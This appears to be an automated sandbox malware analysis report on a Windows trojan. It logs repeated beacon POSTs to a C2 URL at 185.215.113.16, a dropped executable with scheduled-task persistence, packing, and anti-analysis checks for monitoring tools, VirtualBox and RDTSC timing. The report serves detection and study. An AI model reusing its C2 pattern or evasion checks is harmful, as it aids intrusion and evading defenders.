                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: Joe Sandbox View IP Address: 185.215.113.16
                    Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
                    Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_008FBD60 InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile
                    Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php

                    System Summary

                    Source: file.exe Static PE information: section name:
                    Source: file.exe Static PE information: section name: .idata
                    Source: file.exe Static PE information: section name:
                    Source: axplong.exe.0.dr Static PE information: section name:
                    Source: axplong.exe.0.dr Static PE information: section name: .idata
                    Source: axplong.exe.0.dr Static PE information: section name:
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
                    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 4BC8AB389044AABD25719E924300530FEDDAE8EFA8A485CBFD67DE8F347132F2
                    Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exe Static PE information: Section: ZLIB complexity 0.9974561478201635
                    Source: file.exe Static PE information: Section: dmbsosmk ZLIB complexity 0.99479069756624
                    Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9974561478201635
                    Source: axplong.exe.0.dr Static PE information: Section: dmbsosmk ZLIB complexity 0.99479069756624
                    Source: axplong.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: file.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
                    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: file.exe ReversingLabs: Detection: 55%
                    Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                    Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1923072 > 1048576
                    Source: file.exeStatic PE information: Raw size of dmbsosmk is bigger than: 0x100000 < 0x1a3e00

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.cf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 2.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 3.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 6.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmbsosmk:EW;uuntaxqq:EW;.taggant:EW;
                    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.dr | Static PE information: real checksum: 0x1df580 should be: 0x1d9842
                    Source: file.exe | Static PE information: real checksum: 0x1df580 should be: 0x1d9842
                    Source: file.exe | Static PE information: section name:
                    Source: file.exe | Static PE information: section name: .idata
                    Source: file.exe | Static PE information: section name:
                    Source: file.exe | Static PE information: section name: dmbsosmk
                    Source: file.exe | Static PE information: section name: uuntaxqq
                    Source: file.exe | Static PE information: section name: .taggant
                    Source: axplong.exe.0.dr | Static PE information: section name:
                    Source: axplong.exe.0.dr | Static PE information: section name: .idata
                    Source: axplong.exe.0.dr | Static PE information: section name:
                    Source: axplong.exe.0.dr | Static PE information: section name: dmbsosmk
                    Source: axplong.exe.0.dr | Static PE information: section name: uuntaxqq
                    Source: axplong.exe.0.dr | Static PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_0090D84C push ecx; ret 6_2_0090D85F
                    Source: file.exe | Static PE information: section name: entropy: 7.986034970037844
                    Source: file.exe | Static PE information: section name: dmbsosmk entropy: 7.954774902073578
                    Source: axplong.exe.0.dr | Static PE information: section name: entropy: 7.986034970037844
                    Source: axplong.exe.0.dr | Static PE information: section name: dmbsosmk entropy: 7.954774902073578
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: Filemonclass
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\axplong.job
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F175F4 second address: F175F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F175F9 second address: F17603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD4A4ED8666h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17603 second address: F17607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17912 second address: F17918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19A0E second address: F19A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19A14 second address: F19A76 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FD4A4ED8679h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 jbe 00007FD4A4ED8668h 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FD4A4ED8668h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c push 438782AFh 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E85 second address: F19E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A543 second address: F1A548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A548 second address: F1A55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnp 00007FD4A4C54696h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A55D second address: F1A561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A561 second address: F1A567 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A567 second address: F1A56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A56D second address: F1A571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BBB6 second address: F1BBCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
